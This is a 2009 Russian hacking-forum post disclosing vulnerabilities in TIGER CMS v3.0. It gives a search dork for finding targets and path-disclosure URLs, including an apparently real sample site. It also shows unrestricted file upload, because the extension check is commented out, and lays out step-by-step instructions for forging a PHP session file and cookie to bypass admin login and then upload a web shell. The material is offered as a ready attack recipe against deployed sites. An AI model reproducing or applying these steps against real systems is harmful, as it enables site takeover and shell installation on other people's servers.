ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости TIGER CMS
  #1  
Старый 05.01.2009, 23:57
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
Post Уязвимости TIGER CMS

Уязвимости TIGER CMS


Product : TIGER CMS
Vesrion : v3.0
Site : осторожно сплойт!(не мой) http://tigercms.com/
Discovered by: Dimi4
Dork:"Powered by TIGER CMS v3.0"


Path Disclosure
Проканывает обычно на win, либо nix с криво выставлеными правами.
Sample : http://bobruisk.name/admin/engine/modules/uploads/

Usage:

Код:
http://site.com/path/admin/engine/modules/[module_name]
Стандартные модули, которые подходят для этой цели:
Цитата:
uploads
content
links
metatags
news
pass
templates
Заливка произвольного файла
Непонятно для чего, но вина всему - 2 закоментированые по дефолту строчки.

PHP код:
$type strtolower(substr($filenamestrrpos($filename".")));
            
//$types_ok = array("jpg", "bmp", "gif", "png");
            //if(!in_array($type, $types_ok)) $Validate->Locate("javascript:window.close();", 0, 1, "Неверный формат файла.");

            
$new_name 'tiger-'.time().'.'.$type;
            
$a copy($file"../uploads/".$new_name);
            
$path_all getenv("SERVER_NAME"); 
http://site.com/path/admin/?task=uploads&sub_task=add

Обход авторизации в админке.
Need:
  • Шелл на соседнем сайте
  • Доступ на запись в /tmp
Уязвимый код:
admin/login/login2.php

PHP код:
             $_SESSION['user_id_admin'] = $id_admin;
             
$Admins->SuccessAuth($login); 
Для удачного логина нам потребуется логин админа. Рискнем предположить что это "admin"
Составляем сесию:
Имя: sess_0526152ea0fed5dbbfca86639e0f6fa7
Содержимое:

Код:
user_id_admin|s:1:"1";
Сохраняем в /tmp
Не забудьте поставить права 777!

Далее в браузере подделываем куки:
Код:
PHPSESSID=0526152ea0fed5dbbfca86639e0f6fa7
Идем:
http://site.com/path/admin/, Удачно прошли авторизации, заливаем шелл как описано выше.

Спасибо нолику за статью по реверс айпи

Последний раз редактировалось Dimi4; 06.01.2009 в 00:43..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Reviews CMS w3r3.w01f PHP, PERL, MySQL, JavaScript 33 12.04.2010 23:18
Уязвимости Sajon CMS 3.0 $n@ke Сценарии/CMF/СMS 0 26.12.2008 22:08
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10
Многочисленные уязвимости Danneo CMS vectorg Уязвимости 2 23.04.2006 16:38
Девять Комерческих Cms w3r3.w01f PHP, PERL, MySQL, JavaScript 1 21.04.2006 00:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ